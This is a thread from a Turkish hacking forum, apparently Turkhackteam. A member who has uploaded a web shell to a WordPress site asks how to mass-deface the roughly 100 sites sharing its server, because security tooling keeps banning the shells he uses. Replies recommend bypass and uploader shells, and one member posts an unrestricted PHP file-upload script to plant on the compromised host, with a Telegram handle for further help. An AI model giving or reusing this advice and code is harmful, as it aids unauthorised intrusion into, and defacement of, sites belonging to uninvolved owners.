Birden çok siteye aynı anda shell nasıl atılır?

kapon.

Yeni üye
25 May 2024
41
4
Bi tane wordpress sitesindeyim Shell attim sunucuda yaklaşık 100 tane site var çoklu İndex atmak için alfa shell filan koyuyorum ama anında banliyor yardımcı olabilecek varmı

kapon.

Yeni üye
25 May 2024
41
4
Bypass shell dener misin
Nasıl yani anlamadım sadece Türk Shell atabiliyorum

Massdeface yapabilirsin

Evet biliyorum fakat piyasada ki kaliteli shelllerden atınca banliyor sadece turk shell var diğer lerini banliyor

Massdeface yapabilirsin

Ve bu konu daki script i bulamadim

ɴᴜʟʟ

Katılımcı Üye
29 Ağu 2021
763
692
/www/
Nasıl yani anlamadım sadece Türk Shell atabiliyorum
Kullandığın shelleri site engelliyor. Uploader shell deneyebilirsin. Bilgisayar yanımda olsaydı atardım bir kaç tane shell ama yanımda değil. Farklı farklı shelleri denemekte fayda var.

Nar shell'i denesene bi

kapon.

Yeni üye
25 May 2024
41
4
Kullandığın shelleri site engelliyor. Uploader shell deneyebilirsin. Bilgisayar yanımda olsaydı atardım bir kaç tane shell ama yanımda değil. Farklı farklı shelleri denemekte fayda var.

Nar shell'i denesene bi
Deniyorum

Nar shell'i denesene bi
yok narv6 yıda giriyorum ondan sonra işlem yapacağım sırada banlıyor

ɴᴜʟʟ

Katılımcı Üye
29 Ağu 2021
763
692
/www/
yok narv6 yıda giriyorum ondan sonra işlem yapacağım sırada banlıyor
HTML:
<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="upload.php" method="POST">
    <p>Upload your file</p>
    <input type="file" name="uploaded_file"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>
<?PHP
  if(!empty($_FILES['uploaded_file']))
  {
    $path = "uploads/";
    $path = $path . basename( $_FILES['uploaded_file']['name']);

if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
      echo "The file ".  basename( $_FILES['uploaded_file']['name']).
      " has been uploaded";
    } else{
        echo "There was an error uploading the file, please try again!";
    }
  }
?>
Siteye .html olarak yükler misin
Telegram : @Null057 ulaşabilirsin.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.